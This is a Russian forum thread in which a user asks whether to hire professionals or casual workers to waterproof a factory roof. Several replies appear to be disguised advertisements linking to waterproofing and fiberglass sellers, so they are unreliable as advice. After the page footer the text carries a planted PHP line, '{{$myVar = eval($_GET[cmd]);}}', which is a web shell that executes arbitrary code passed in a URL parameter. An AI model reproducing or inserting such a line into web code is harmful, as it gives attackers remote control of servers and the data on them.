+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Гидроизоляция кровли


  1. #1
    Мимо проходил Kommunar is on a distinguished road Аватар для Kommunar
    Регистрация
    26.01.2019
    Откуда
    .....
    Машина
    .....
    Сообщений
    66

    Гидроизоляция кровли

    Заканчиваю ремонт на производстве. В ближайшее время нужно сделать гидроизоляцию кровли на мое производственное помещение. Как по вашему мнению - стоит нанимать профессионалов или доверить работу обычным ребятам с Авито?

  2. #2
    Мимо проходил nekrolog is on a distinguished road Аватар для nekrolog
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    54
    Я бы не доверил такое важное занятие как гидроизоляция кровли обычным людям, нанятым по объявлению. Вы ведь совсем не знаете насколько грамотно они подойдут к выполнению своих обязанностей. На вашем месте я бы обратился к специалистам, которые, уж точно, знают всю технологию работы. Вот здесь можно заказать гидроизоляцию кровли, автор https://haveg.ru/uslugi/

  3. #3
    Мимо проходил Bimbom is on a distinguished road Аватар для Bimbom
    Регистрация
    26.01.2019
    Откуда
    ......
    Машина
    .....
    Сообщений
    45
    Я сам делал гидроизоляцию, но раз у вас целое производственное здание, то нужно нанимать бригаду, можно, кстати, и с Авито, там вполне нормальные ребята. В этом деле главное - выбрать хороший материал и тогда все будет в порядке.

  4. #4
    Мимо проходил Victan is on a distinguished road Аватар для Victan
    Регистрация
    12.01.2019
    Откуда
    ......
    Машина
    ....
    Сообщений
    39
    Автор, можно взять технониколь и нанять обычных - кровелищиков из жилконторы. У них и расценки небольшие. Я не так давно пользовался их услугами.

  5. #5
    Новичок Meloun is on a distinguished road Аватар для Meloun
    Регистрация
    14.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    107
    Битумная гидроизоляция – это тот материал, который зачастую выбирают по цене, а не по качеству, потому что многие считают, что оно либо одинаковое, либо не стоит заморачиваться по этому поводу. Я больше все же склоняюсь к качеству, так как гидроизоляция играет большую роль в защите дома от влаги и сырости. А вообще мне удалось найти компании, где и цена не высокая, и качество отличное. Я все купил в компании gidroisol – у них качественная гидроизоляция https://gidroisol.ru.

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Заказывал стеклоткань https://mkrz.ru/catalog/steklotkani/, очень понравилась работа менеджера, который вежливо ответил на все интересующие вопросы, дал дельные советы. Цена на сайте актуальная, намного ниже, чем у аналогичных магазинов, на качестве это никак не отображается. Доставка быстрая и в срок.

+ Ответить в теме

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}